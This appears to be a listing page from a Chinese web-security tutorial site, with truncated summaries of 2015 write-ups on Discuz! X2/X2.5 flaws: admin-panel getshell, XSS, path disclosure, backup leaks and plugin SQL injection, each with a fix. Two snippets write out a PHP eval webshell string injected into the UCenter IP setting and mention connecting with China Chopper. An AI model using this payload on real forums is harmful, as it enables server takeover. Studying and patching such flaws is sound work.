-
discuz!X2.5最新版后台管理员权限Getshell及修复 - 网
discuz!X2.5最新版后台管理员权限Getshell。1.在后台--站长--Ucenter设置处设置UcenterIP为XX\\#39;);eval($_POST[a])?;// XX2.发现管理页面代码出来了3.上菜刀!4.看一下源码,哦,原来是这样的!修复方...
栏目:网站安全 点击:63 日期:2015-04-17 -
discuz! X2.5类似鸡肋存储Xss - 网站安全 - 自学php
貌似鸡肋,因为要造成XSS是需要有一定的权限,比如论坛的斑竹什么的,普通会员的话好像不行,因为存在XSS的地方是一个转账功能,而在此转账功能下面还有一个留言框,而造成XSS的就...
栏目:网站安全 点击:29 日期:2015-04-17 -
discuz X2.5最新版爆路径 - 网站安全 - 自学php
漏洞证明:http://www.erdare.com/source/plugin/myrepeats/table/table_myrepeats.php修复方案:加!defined(IN_UC) exit(Access Denied);就好了...
栏目:网站安全 点击:48 日期:2015-04-17 -
discuz论坛Xss - 网站安全 - 自学php
http://www.discuz.net/forum.php?mod=imageaid=1242959size=300x300key=d2c01bb59f1d3c17601494cc0689c962nocache=yestype=fixnone在用户回复部分,可以用户自己上传图片,在图片列表中可以查看自己上传的......
栏目:网站安全 点击:100 日期:2015-04-17 -
discuz全版本数据库备份文件泄漏及修复 - 网站安
Windows short filenames造成的discuz数据库备份文件泄漏.只适用于跑在windows下的apache下的DZ!不仅仅是DZ存在这个问题哦.看详细之前请去自行了解下Windows short filenames这个漏洞的详情!首先.了解...
栏目:网站安全 点击:92 日期:2015-04-17 -
discuz的php防止sql注入函数 - 网站安全 - 自学php
$magic_quotes_gpc = get_magic_quotes_gpc();@extract(daddslashes($_COOKIE));@extract(daddslashes($_POST));@extract(daddslashes($_GET));if(!$magic_quotes_gpc) {$_FILES = daddslashes($_FILES);}w......
栏目:网站安全 点击:39 日期:2015-04-17 -
discuz X2.5后台拿shell及修复 - 网站安全 - 自学php
有管理员帐号及密码。直接在UCenter IP 地址:里面插入一句话xxoo\\);eval($_POST[a])?;// 就ok 然后菜刀连接http://www.2cto.com /config/config_ucenter.php密码a ,测试通过...
栏目:网站安全 点击:38 日期:2015-04-17 -
discuz 某插件SQL注入漏洞及修复 - 网站安全 - 自学
可注入点www.2cto.com /plugin.php可注入参数imes,ljtype,m,orderby,page,telid贴一个ljtype的随便找一个POST测试一下修复方案:=-=~好多站都关了这个插件。。。...
栏目:网站安全 点击:43 日期:2015-04-17 -
discuz X2路径泄露 - 网站安全 - 自学php
缺少exit(lsquo;Access Deniedrsquo;);直接浏览该程序直接报错BTW 一共发现了7个XSS 包含储存式跟反射式.等之后整完整點再发出来檔案路徑:/source/include/misc/misc_ranklist_index.php修复方案:加上exit...
栏目:网站安全 点击:43 日期:2015-04-17 -
discuzX2.5跨站漏洞利用 - 网站安全 - 自学php
0times;01 无法用获取的COOKIE登录分析都说discuz X2.5(以下简称DZ25)的COOKIE拿到了也没有办法登录,但是为什么呢?今天就来简单的看一下,我们登录一个DZ25的站,登陆之后看下COOKIE在里面...
栏目:网站安全 点击:46 日期:2015-04-17